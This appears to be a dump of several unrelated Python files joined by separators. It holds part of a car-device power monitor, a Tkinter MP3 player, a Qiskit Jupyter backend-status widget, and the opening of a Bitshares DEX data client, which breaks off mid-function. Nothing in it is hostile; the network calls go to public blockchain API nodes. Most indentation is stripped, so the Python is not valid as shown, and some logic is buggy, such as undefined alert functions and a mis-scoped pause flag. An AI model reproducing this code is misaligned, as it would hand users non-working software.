# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (self.params.get("DisablePowerDown") != b"1")
disable_charging |= (self.params.get("ForcePowerDown") == b"1")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen
return should_shutdown
|
Mp3 Player.py
|
import os
import threading
import time
import tkinter.messagebox
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from ttkthemes import themed_tk as tk
from mutagen.mp3 import MP3
from pygame import mixer
root = tk.ThemedTk()
root.get_themes() # Returns a list of all themes that can be set
root.set_theme("radiance") # Sets an available theme
# Fonts - Arial (corresponds to Helvetica), Courier New (Courier), Comic Sans MS, Fixedsys,
# MS Sans Serif, MS Serif, Symbol, System, Times New Roman (Times), and Verdana
#
# Styles - normal, bold, roman, italic, underline, and overstrike.
statusbar = ttk.Label(root, text="Welcome to Melody", relief=SUNKEN, anchor=W, font='Times 10 italic')
statusbar.pack(side=BOTTOM, fill=X)
# Create the menubar
menubar = Menu(root)
root.config(menu=menubar)
# Create the submenu
subMenu = Menu(menubar, tearoff=0)
playlist = []
# playlist - contains the full path + filename
# playlistbox - contains just the filename
# The full path + filename is required to load the track inside play_music()
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
mixer.music.queue(filename_path)
def add_to_playlist(filename):
filename = os.path.basename(filename)
index = 0
playlistbox.insert(index, filename)
playlist.insert(index, filename_path)
index += 1
menubar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
def about_us():
    tkinter.messagebox.showinfo('About Melody', 'This is a music player built using Python Tkinter by Harish')
subMenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About Us", command=about_us)
mixer.init() # initializing the mixer
root.title("Melody")
root.iconbitmap(r'images/melody.ico')
# Root Window - StatusBar, LeftFrame, RightFrame
# LeftFrame - The listbox (playlist)
# RightFrame - TopFrame,MiddleFrame and the BottomFrame
leftframe = Frame(root)
leftframe.pack(side=LEFT, padx=30, pady=30)
playlistbox = Listbox(leftframe)
playlistbox.pack()
addBtn = ttk.Button(leftframe, text="+ Add", command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
playlistbox.delete(selected_song)
playlist.pop(selected_song)
delBtn = ttk.Button(leftframe, text="- Del", command=del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack(pady=30)
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = ttk.Label(topframe, text='Total Length : --:--')
lengthlabel.pack(pady=5)
currenttimelabel = ttk.Label(topframe, text='Current Time : --:--', relief=GROOVE)
currenttimelabel.pack()
def show_details(play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
# div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
def start_count(t):
global paused
    # mixer.music.get_busy() - returns False once the stop button is pressed (music stops playing)
    # continue - skips the statements below it while the music is paused
current_time = 0
while current_time <= t and mixer.music.get_busy():
        if paused:
            # avoid a busy loop while paused; sleep briefly before re-checking
            time.sleep(0.3)
            continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
time.sleep(1)
current_time += 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
play_it = playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('File not found', 'Melody could not find the file. Please check again.')
def stop_music():
mixer.music.stop()
statusbar['text'] = "Music Stopped"
paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
# set_volume of mixer takes value only from 0 to 1. Example - 0, 0.1, 0.55, 0.54, 0.99, 1
muted = FALSE
def mute_music():
global muted
if muted: # Unmute the music
mixer.music.set_volume(0.7)
volumeBtn.configure(image=volumePhoto)
scale.set(70)
muted = FALSE
else: # mute the music
mixer.music.set_volume(0)
volumeBtn.configure(image=mutePhoto)
scale.set(0)
muted = TRUE
middleframe = Frame(rightframe)
middleframe.pack(pady=30, padx=30)
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music)
playBtn.grid(row=0, column=0, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0, column=1, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music)
pauseBtn.grid(row=0, column=2, padx=10)
# Bottom Frame for volume, rewind, mute etc.
bottomframe = Frame(rightframe)
bottomframe.pack()
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music)
rewindBtn.grid(row=0, column=0)
mutePhoto = PhotoImage(file='images/mute.png')
volumePhoto = PhotoImage(file='images/volume.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)
volumeBtn.grid(row=0, column=1)
scale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(70) # implement the default value of scale when music player starts
mixer.music.set_volume(0.7)
scale.grid(row=0, column=2, pady=15, padx=30)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
|
_backend_overview.py
|
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
"""A module for monitoring backends."""
import time
import threading
import types
from IPython.display import display # pylint: disable=import-error
from IPython.core.magic import line_magic, Magics, magics_class # pylint: disable=import-error
from IPython.core import magic_arguments # pylint: disable=import-error
import ipywidgets as widgets # pylint: disable=import-error
import matplotlib.pyplot as plt # pylint: disable=import-error
from qiskit.tools.monitor.backend_overview import get_unique_backends
from qiskit.tools.visualization._gate_map import plot_gate_map
@magics_class
class BackendOverview(Magics):
"""A class of status magic functions.
"""
@line_magic
@magic_arguments.magic_arguments()
@magic_arguments.argument(
'-i',
'--interval',
type=float,
default=60,
help='Interval for status check.'
)
def qiskit_backend_overview(self, line='', cell=None): # pylint: disable=W0613
"""A Jupyter magic function to monitor backends.
"""
args = magic_arguments.parse_argstring(
self.qiskit_backend_overview, line)
unique_hardware_backends = get_unique_backends()
_value = "<h2 style ='color:#ffffff; background-color:#000000;"
_value += "padding-top: 1%; padding-bottom: 1%;padding-left: 1%;"
_value += "margin-top: 0px'>Backend Overview</h2>"
backend_title = widgets.HTML(value=_value,
layout=widgets.Layout(margin='0px 0px 0px 0px'))
build_back_widgets = [backend_widget(b)
for b in unique_hardware_backends]
_backends = []
# Sort backends by operational or not
oper_ord_backends = []
for n, back in enumerate(unique_hardware_backends):
if back.status().operational:
oper_ord_backends = [build_back_widgets[n]] + oper_ord_backends
_backends = [back] + _backends
else:
oper_ord_backends = oper_ord_backends + [build_back_widgets[n]]
_backends = _backends + [back]
qubit_label = widgets.Label(value='Num. Qubits')
pend_label = widgets.Label(value='Pending Jobs')
least_label = widgets.Label(value='Least Busy')
oper_label = widgets.Label(
value='Operational', layout=widgets.Layout(margin='5px 0px 0px 0px'))
t1_label = widgets.Label(
value='Avg. T1', layout=widgets.Layout(margin='10px 0px 0px 0px'))
t2_label = widgets.Label(
value='Avg. T2', layout=widgets.Layout(margin='10px 0px 0px 0px'))
labels_widget = widgets.VBox([qubit_label, pend_label, least_label,
oper_label, t1_label, t2_label],
layout=widgets.Layout(margin='295px 0px 0px 0px',
min_width='100px'))
backend_grid = GridBox_with_thread(children=oper_ord_backends,
layout=widgets.Layout(
grid_template_columns='250px ' *
len(unique_hardware_backends),
grid_template_rows='auto',
grid_gap='0px 25px'))
backend_grid._backends = _backends # pylint: disable=W0201
backend_grid._update = types.MethodType( # pylint: disable=W0201
update_backend_info, backend_grid)
backend_grid._thread = threading.Thread( # pylint: disable=W0201
target=backend_grid._update, args=(args.interval,))
backend_grid._thread.start()
back_box = widgets.HBox([labels_widget, backend_grid])
back_monitor = widgets.VBox([backend_title, back_box])
display(back_monitor)
class GridBox_with_thread(widgets.GridBox): # pylint: disable=invalid-name
"""A GridBox that will close an attached thread
"""
def __del__(self):
"""Object disposal"""
if hasattr(self, '_thread'):
try:
self._thread.do_run = False
self._thread.join()
except Exception: # pylint: disable=W0703
pass
self.close()
def backend_widget(backend):
"""Creates a backend widget.
"""
config = backend.configuration().to_dict()
props = backend.properties().to_dict()
name = widgets.HTML(value="<h4>{name}</h4>".format(name=backend.name()),
layout=widgets.Layout())
n_qubits = config['n_qubits']
qubit_count = widgets.HTML(value="<h5><b>{qubits}</b></h5>".format(qubits=n_qubits),
layout=widgets.Layout(justify_content='center'))
cmap = widgets.Output(layout=widgets.Layout(min_width='250px', max_width='250px',
max_height='250px',
min_height='250px',
justify_content='center',
align_items='center',
margin='0px 0px 0px 0px'))
with cmap:
_cmap_fig = plot_gate_map(backend,
plot_directed=False,
label_qubits=False)
if _cmap_fig is not None:
display(_cmap_fig)
# Prevents plot from showing up twice.
plt.close(_cmap_fig)
pending = generate_jobs_pending_widget()
is_oper = widgets.HTML(value="<h5></h5>",
layout=widgets.Layout(justify_content='center'))
least_busy = widgets.HTML(value="<h5></h5>",
layout=widgets.Layout(justify_content='center'))
t1_units = props['qubits'][0][0]['unit']
avg_t1 = round(sum([q[0]['value'] for q in props['qubits']])/n_qubits, 1)
t1_widget = widgets.HTML(value="<h5>{t1} {units}</h5>".format(t1=avg_t1, units=t1_units),
layout=widgets.Layout())
t2_units = props['qubits'][0][1]['unit']
avg_t2 = round(sum([q[1]['value'] for q in props['qubits']])/n_qubits, 1)
t2_widget = widgets.HTML(value="<h5>{t2} {units}</h5>".format(t2=avg_t2, units=t2_units),
layout=widgets.Layout())
out = widgets.VBox([name, cmap, qubit_count, pending,
least_busy, is_oper, t1_widget, t2_widget],
layout=widgets.Layout(display='inline-flex',
flex_flow='column',
align_items='center'))
out._is_alive = True
return out
def update_backend_info(self, interval=60):
"""Updates the monitor info
Called from another thread.
"""
my_thread = threading.currentThread()
current_interval = 0
started = False
all_dead = False
stati = [None]*len(self._backends)
while getattr(my_thread, "do_run", True) and not all_dead:
if current_interval == interval or started is False:
for ind, back in enumerate(self._backends):
_value = self.children[ind].children[2].value
_head = _value.split('<b>')[0]
try:
_status = back.status()
stati[ind] = _status
except Exception: # pylint: disable=W0703
self.children[ind].children[2].value = _value.replace(
_head, "<h5 style='color:#ff5c49'>")
self.children[ind]._is_alive = False
else:
self.children[ind]._is_alive = True
self.children[ind].children[2].value = _value.replace(
_head, "<h5>")
idx = list(range(len(self._backends)))
pending = [s.pending_jobs for s in stati]
_, least_idx = zip(*sorted(zip(pending, idx)))
# Make sure least pending is operational
for ind in least_idx:
if stati[ind].operational:
least_pending_idx = ind
break
for var in idx:
if var == least_pending_idx:
self.children[var].children[4].value = "<h5 style='color:#34bc6e'>True</h5>"
else:
self.children[var].children[4].value = "<h5 style='color:#dc267f'>False</h5>"
self.children[var].children[3].children[1].value = pending[var]
self.children[var].children[3].children[1].max = max(
self.children[var].children[3].children[1].max, pending[var]+10)
if stati[var].operational:
self.children[var].children[5].value = "<h5 style='color:#34bc6e'>True</h5>"
else:
self.children[var].children[5].value = "<h5 style='color:#dc267f'>False</h5>"
started = True
current_interval = 0
time.sleep(1)
all_dead = not any([wid._is_alive for wid in self.children])
current_interval += 1
def generate_jobs_pending_widget():
"""Generates a jobs_pending progress bar widget.
"""
pbar = widgets.IntProgress(
value=0,
min=0,
max=50,
description='',
orientation='horizontal', layout=widgets.Layout(max_width='180px'))
pbar.style.bar_color = '#71cddd'
pbar_current = widgets.Label(
value=str(pbar.value), layout=widgets.Layout(min_width='auto'))
pbar_max = widgets.Label(
value=str(pbar.max), layout=widgets.Layout(min_width='auto'))
def _on_max_change(change):
pbar_max.value = str(change['new'])
def _on_val_change(change):
pbar_current.value = str(change['new'])
pbar.observe(_on_max_change, names='max')
pbar.observe(_on_val_change, names='value')
jobs_widget = widgets.HBox([pbar_current, pbar, pbar_max],
layout=widgets.Layout(max_width='250px',
min_width='250px',
justify_content='center'))
return jobs_widget
|
metaNODE11.py
|
' litepresence 2018 '
def WTFPL_v0_March_1765():
if any([stamps, licenses, taxation, regulation, fiat, etat]):
try:
print('no thank you')
except:
return [tar, feathers]
from random import random, shuffle, randint, choice
from ast import literal_eval as literal
from multiprocessing import Process
from datetime import datetime
from statistics import mode
import traceback
import numpy
import time
import json
import sys
import os
try:
import websocket
websocket.enableTrace(True)
except:
raise ValueError('pip install websocket-client')
def banner():
print("\033c")
if 1:
print(
'''
Do this:
metaNODE = Bitshares_Trustless_Client()
''')
time.sleep(4)
print("\033c")
print(
'''
Get these curated Bitshares DEX feeds:
''')
time.sleep(0.5)
print(" metaNODE['last'] #" +
" float; latest price \n")
time.sleep(0.5)
print(" metaNODE['bids'] #" +
" list of (price,amount) tuples; [0][0]=highest bid price \n")
time.sleep(0.5)
print(" metaNODE['asks'] #" +
" list of (price,amount) tuples; [0][0]=lowest ask price \n")
time.sleep(0.5)
print(" metaNODE['history'] #" +
" list of (unix,price,amount) tuples; [0][0]=last trade time \n")
time.sleep(0.5)
print(" metaNODE['currency'] #" +
" float; quantity of currency \n")
time.sleep(0.5)
print(" metaNODE['assets'] #" +
" float; quantity of assets \n")
print(" metaNODE['orders'] #" +
" list of dicts of human readable orders \n")
time.sleep(0.5)
print(" metaNODE['whitelist'] #" +
" list; [0]=most recently whitelisted node \n")
time.sleep(0.5)
print(" metaNODE['blacklist'] #" +
" list; [0]=most recently blacklisted node \n")
time.sleep(0.5)
print(" metaNODE['blocktime'] #" +
" oldest blockchain time in metaNODE data \n\n\n\n")
time.sleep(1)
print("to watch data feed, in second terminal type:")
print('')
print('>>> tail -f metaNODE.txt')
print('')
print("to watch error report, in third terminal type:")
print('')
print('>>> tail -f metaNODElog.txt')
print('')
time.sleep(2)
# GLOBALS
# ======================================================================
def controls():
global WHITE, BLACK, TIMEOUT, PROCESSES, MAVENS
global BOOK_DEPTH, HISTORY_DEPTH, PAUSE, BLIP
#As Tested
WHITE = 20 #20
BLACK = 30 #30
TIMEOUT = 300 #300
PROCESSES = 20 #20
MAVENS = 7 #7
BOOK_DEPTH = 10 #10
HISTORY_DEPTH = 50 #50
PAUSE = 4 #2
BLIP = 0.05 #0.05
def public_nodes():
global nodes, node_count
nodes = ['wss://ap-northeast-1.bts.crypto-bridge.org/wss',
'wss://ap-northeast-2.bts.crypto-bridge.org/wss',
'wss://ap-southeast-1.bts.crypto-bridge.org/wss',
'wss://ap-southeast-2.bts.crypto-bridge.org/wss',
'wss://api-ru.bts.blckchnd.com/wss',
'wss://api.bitshares.bhuz.info/ws',
'wss://api.bitsharesdex.com',
'wss://api.bts.ai/',
'wss://api.bts.blckchnd.com/wss',
'wss://api.bts.mobi/wss',
'wss://api.bts.network',
'wss://api.btsgo.net/ws',
'wss://api.btsxchng.com',
'wss://atlanta.bitshares.apasia.tech/ws',
'wss://australia.bitshares.apasia.tech/ws',
'wss://b.mrx.im/wss',
'wss://bit.btsabc.org/ws',
'wss://bitshares-api.wancloud.io/ws',
'wss://bitshares.apasia.tech/ws',
'wss://bitshares.bts123.cc:15138/',
'wss://bitshares.crypto.fans/ws',
'wss://bitshares.cyberit.io/',
'wss://bitshares.dacplay.org/wss',
'wss://bitshares.dacplay.org:8089/wss',
'wss://bitshares.neocrypto.io/wss',
'wss://bitshares.nu/ws',
'wss://bitshares.openledger.info/ws',
'wss://blockzms.xyz/ws',
'wss://bts-api.lafona.net/ws',
'wss://bts-seoul.clockwork.gr',
'wss://bts.ai.la/wss',
'wss://bts.proxyhosts.info/wss',
'wss://bts.open.icowallet.net/ws',
'wss://bts.to0l.cn:4443/ws',
'wss://bts.transwiser.com/wss',
'wss://btsws.roelandp.nl/ws',
'wss://btsza.co.za:8091/ws',
'wss://canada6.daostreet.com/ws',
'wss://capetown.bitshares.africa/ws',
'wss://chicago.bitshares.apasia.tech/ws',
'wss://crazybit.online',
'wss://croatia.bitshares.apasia.tech/ws',
'wss://dallas.bitshares.apasia.tech/ws',
'wss://dele-puppy.com/wss',
'wss://dex.rnglab.org/wss',
'wss://dexnode.net/wss',
'wss://england.bitshares.apasia.tech/ws',
'wss://eu-central-1.bts.crypto-bridge.org/wss',
'wss://eu-west-1.bts.crypto-bridge.org/wss',
'wss://eu.nodes.bitshares.ws/wss',
'wss://eu.openledger.info/ws',
'wss://france.bitshares.apasia.tech/ws',
'wss://frankfurt8.daostreet.com/ws',
'wss://freedom.bts123.cc:15138/',
'wss://japan.bitshares.apasia.tech/ws',
'wss://kc-us-dex.xeldal.com/wss',
'wss://kimziv.com/ws',
'wss://la.dexnode.net/wss',
'wss://miami.bitshares.apasia.tech/ws',
'wss://ncali5.daostreet.com/ws',
'wss://new-york.bitshares.apasia.tech/ws',
'wss://node.bitshares.eu/wss',
'wss://node.btscharts.com/ws',
'wss://node.market.rudex.org/wss',
'wss://nohistory.proxyhosts.info/wss',
'wss://ohio4.daostreet.com/ws',
'wss://openledger.hk/ws',
'wss://oregon2.daostreet.com/ws',
'wss://paris7.daostreet.com/ws',
'wss://relinked.com/ws',
'wss://sa-east-1.bts.crypto-bridge.org/wss',
'wss://scali10.daostreet.com/ws',
'wss://seattle.bitshares.apasia.tech/ws',
'wss://seoul9.daostreet.com/ws',
'wss://sg.nodes.bitshares.ws/wss',
'wss://singapore.bitshares.apasia.tech/ws',
'wss://slovenia.bitshares.apasia.tech/wss',
'wss://this.uptick.rocks/ws',
'wss://us-east-1.bts.crypto-bridge.org/wss',
'wss://us-la.bitshares.apasia.tech/ws',
'wss://us-ny.bitshares.apasia.tech/wss',
'wss://us-west-1.bts.crypto-bridge.org/wss',
'wss://us.nodes.bitshares.ws/wss',
'wss://valen-tin.fr:8090/wss',
'wss://valley.bitshares.apasia.tech/ws',
'wss://virginia3.daostreet.com/ws',
'wss://ws.gdex.io',
'wss://ws.gdex.top/wss',
'wss://ws.hellobts.com/',
'wss://ws.winex.pro/wss',
'wss://za.bitshares.africa/ws', ]
node_count = len(nodes)
def constants():
global Z, TZ, MAINNET, BEGIN
TZ = time.altzone
MAINNET = ('4018d7844c78f6a6c41c6a552b89802' +
'2310fc5dec06da467ee7905a8dad512c8')
Z = '{"id":1,"method":"call","params":["database",'
BEGIN = int(time.time())
def sign_in():
global account_name, currency, asset
print('''
(BTS) litepresence1
Resistance and Disobedience in Economic Activity
is the Most Moral Human Action Possible
-SEK3''')
print('')
print('Input Account and Market, or press Enter for demo')
print('')
account_name = input('account name: ').strip('"').strip("'")
print('')
currency = input(' currency: ').strip('"').strip("'").upper()
print('')
asset = input(' asset: ').strip('"').strip("'").upper()
print('')
if account_name == '':
account_name = 'abc123'
if currency == '':
currency = 'GDEX.BTC'
if asset == '':
asset = 'BTS'
def initialize():
now = int(time.time())
race_write(doc='blacklist.txt', text=[])
race_write(doc='whitelist.txt', text=[])
race_write(doc='metaNODElog.txt', text='')
race_write(doc='metaNODE.txt', text={})
race_write(doc='mavens.txt', text=[])
race_write(doc='watchdog.txt', text=[now, now])
# TEXT PIPE
# ======================================================================
def Bitshares_Trustless_Client(): # Your access to the metaNODE
# Include this definition in your script to access metaNODE.txt
# Deploy your bot script in the same folder as metaNODE.py
'from ast import literal_eval as literal'
i = 0
while True:
time.sleep(0.05 * i ** 2)
i += 1
try:
with open('metaNODE.txt', 'r') as f:
ret = f.read()
f.close()
metaNODE = literal(ret)
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
return metaNODE
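# A minimal usage sketch for a separate bot script kept in the same folder
# (illustrative only; the keys shown are the ones documented in banner() above):
#
#     metaNODE = Bitshares_Trustless_Client()
#     print(metaNODE['last'])        # float; latest price
#     print(metaNODE['bids'][0][0])  # highest bid price
#     print(metaNODE['asks'][0][0])  # lowest ask price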
def race_read(doc=''): # Concurrent Read from File Operation
i = 0
while True:
time.sleep(BLIP * i ** 2)
i += 1
try:
with open(doc, 'r') as f:
ret = f.read()
f.close()
try:
ret = literal(ret)
except:
try:
ret = ret.split(']')[0] + ']'
ret = literal(ret)
except:
try:
ret = ret.split('}')[0] + '}'
ret = literal(ret)
except:
if '{' in ret:
ret = {}
else:
ret = []
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
return ret
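# Note: the time.sleep(BLIP * i ** 2) retry used by the race_* helpers backs
# off quadratically (0, 0.05 s, 0.2 s, 0.45 s, ... with BLIP = 0.05) while the
# file is being written by another process.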
def race_write(doc='', text=''): # Concurrent Write to File Operation
text = str(text)
i = 0
while True:
time.sleep(BLIP * i ** 2)
i += 1
try:
with open(doc, 'w+') as f:
f.write(text)
f.close()
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
def race_append(doc='', text=''): # Concurrent Append to File Operation
text = '\n' + str(time.ctime()) + ' ' + str(text) + '\n'
i = 0
while True:
time.sleep(BLIP * i ** 2)
i += 1
try:
if i > 10:
break
with open(doc, 'a+') as f:
f.write(text)
f.close()
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
def watchdog():
identity = 1 # metaNODE:1, botscript:0
max_latency = 600
while 1:
try:
try:
with open('watchdog.txt', 'r') as f:
ret = f.read()
f.close()
ret = literal(ret)
response = int(ret[identity])
now = int(time.time())
latency = now-response
if identity == 0:
msg = str([response, now])
if identity == 1:
msg = str([now, response])
with open('watchdog.txt', 'w+') as f:
f.write(msg)
f.close()
msg = str(latency)
if latency > max_latency:
bell()
gmail()
msg += ' !!!!! WARNING: the other app is not responding !!!!!'
return msg
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
now = int(time.time())
with open('watchdog.txt', 'w+') as f:
f.write(str([now, now]))
f.close()
break # exit while loop
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
# CURATION
# ======================================================================
def inquire(call): # single use public node database api call
while True:
try:
black = race_read(doc='blacklist.txt')
white = race_read(doc='whitelist.txt')
# switch nodes
shuffle(nodes)
node = nodes[0]
print(node)
if node in black:
raise ValueError('blacklisted')
if node in white:
raise ValueError('whitelisted')
call = call.replace("'", '"') # never use single quotes
ws = websocket.create_connection(node, timeout=6)
ws.send(call)
ret = json.loads(ws.recv())['result']
ws.close()
winnow('whitelist', node)
return ret
except Exception as e:
msg = str(type(e).__name__) + str(e.args) + node
print(msg)
race_append(doc='metaNODElog.txt', text=msg)
winnow('blacklist', node)
pass
def cache(): # acquire asset id and asset amount decimal place
# given account name, currency and asset symbols, lookup these globals
global account_id, asset_id, currency_id
global asset_precision, currency_precision
lookup_accounts = Z + \
'"lookup_accounts",["%s", "%s"]]}' % (account_name, 1)
lookup_asset_symbols = Z + \
'"lookup_asset_symbols",[["%s", "%s"]]]}' % (asset, currency)
account_ids, asset_ids, currency_ids = [], [], []
asset_precisions, currency_precisions = [], []
def wwc():
print("\033c")
logo()
print('')
print(time.ctime())
print('')
print('Winnowing Websocket Connections...')
print('==================================')
print('')
# trustless of multiple nodes
for i in range(3):
wwc()
account_id = (inquire(lookup_accounts))[0][1]
wwc()
ret = inquire(lookup_asset_symbols)
asset_id = ret[0]['id']
asset_precision = ret[0]['precision']
currency_id = ret[1]['id']
currency_precision = ret[1]['precision']
account_ids.append(account_id)
asset_ids.append(asset_id)
currency_ids.append(currency_id)
asset_precisions.append(asset_precision)
currency_precisions.append(currency_precision)
account_id = mode(account_ids)
asset_id = mode(asset_ids)
currency_id = mode(currency_ids)
asset_precision = mode(asset_precisions)
currency_precision = mode(currency_precisions)
websocket.enableTrace(False)
print_market()
def spawn(): # multiprocessing handler
# initialize background bifurcation process
b_process = Process(target=bifurcation)
b_process.daemon = False
b_process.start()
# initialize multiple threshing processes
b = 0
c = 0
multinode = {}
for a in range(PROCESSES):
c += 1
multinode[str(a)] = Process(target=thresh, args=(a, b, c))
multinode[str(a)].daemon = False
multinode[str(a)].start()
time.sleep(BLIP)
# kill and respawn threshing processes periodically for durability
# even if anything gets hung metaNODE always moves on
while True:
b += 1
race_write(doc='metaNODElog.txt', text='')
for a in range(PROCESSES):
c += 1
time.sleep(TIMEOUT / 2 + TIMEOUT * random())
try:
multinode[str(a)].terminate()
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print('terminate() WARNING', msg)
race_append(doc='metaNODElog.txt', text=msg)
pass
try:
multinode[str(a)] = Process(target=thresh, args=(a, b, c))
multinode[str(a)].daemon = False
multinode[str(a)].start()
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print('process() WARNING', msg)
race_append(doc='metaNODElog.txt', text=msg)
pass
def thresh(process, epoch, pid): # make calls, shake out errors
# DATABASE CALLS
def dex_handshake(node):
start = time.time()
ws = websocket.create_connection(node, timeout=4)
handshake_latency = time.time() - start
        if not 0 < handshake_latency < 4:
            raise ValueError('handshake_latency', handshake_latency)
return handshake_latency, ws
def dex_ping_latency(ws):
get_chain_id = Z + '"get_chain_id",[]]}'
start = time.time()
ws.send(get_chain_id)
chain_id = json.loads(ws.recv())['result']
ping_latency = time.time() - start
if chain_id != MAINNET:
raise ValueError('chain_id != MAINNET')
        if not 0 < ping_latency < 1:
            raise ValueError('ping_latency', ping_latency)
return ping_latency
def dex_block_latency(ws):
get_dynamic_global_properties = Z + \
'"get_dynamic_global_properties",[]]}'
ws.send(get_dynamic_global_properties)
dynamic_global_properties = json.loads(ws.recv())['result']
blocktime = from_iso_date(dynamic_global_properties['time'])
block_latency = TZ + time.time() - blocktime
        if not 0 < block_latency < 6:
            raise ValueError('blocktime is stale', block_latency)
return block_latency, blocktime
def dex_last(ws, currency, asset):
get_ticker = Z + \
'"get_ticker",["%s","%s","%s"]]}' % (
currency, asset, False)
ws.send(get_ticker)
ticker = json.loads(ws.recv())['result']
last = precision(ticker['latest'], 16)
if float(last) == 0:
raise ValueError('zero price last')
return last
def dex_market_history(ws, currency, asset, now, then, depth=100):
get_trade_history = Z + \
'"get_trade_history",["%s","%s","%s","%s","%s"]]}' % (
currency, asset, now, then, depth)
ws.send(get_trade_history)
trade_history = json.loads(ws.recv())['result']
history = []
for i in range(len(trade_history)):
unix = from_iso_date(trade_history[i]['date'])
price = precision(trade_history[i]['price'], 16)
if float(price) == 0:
raise ValueError('zero price in history')
amount = precision(
trade_history[i]['amount'], asset_precision)
history.append((unix, price, amount))
if not len(history):
raise ValueError('no history')
return history
def dex_account_balances(ws, account_name,
asset_ids=[],
asset_precisions=[]):
if '1.3.0' not in asset_ids:
asset_ids.append('1.3.0')
asset_precisions.append(5)
get_balances = Z + (
'"get_named_account_balances",["%s", [' %
account_name)
for i in range(len(asset_ids)):
get_balances += ('"' + asset_ids[i] + '",')
get_balances += ']]]}'
ws.send(get_balances)
ret = json.loads(ws.recv())['result']
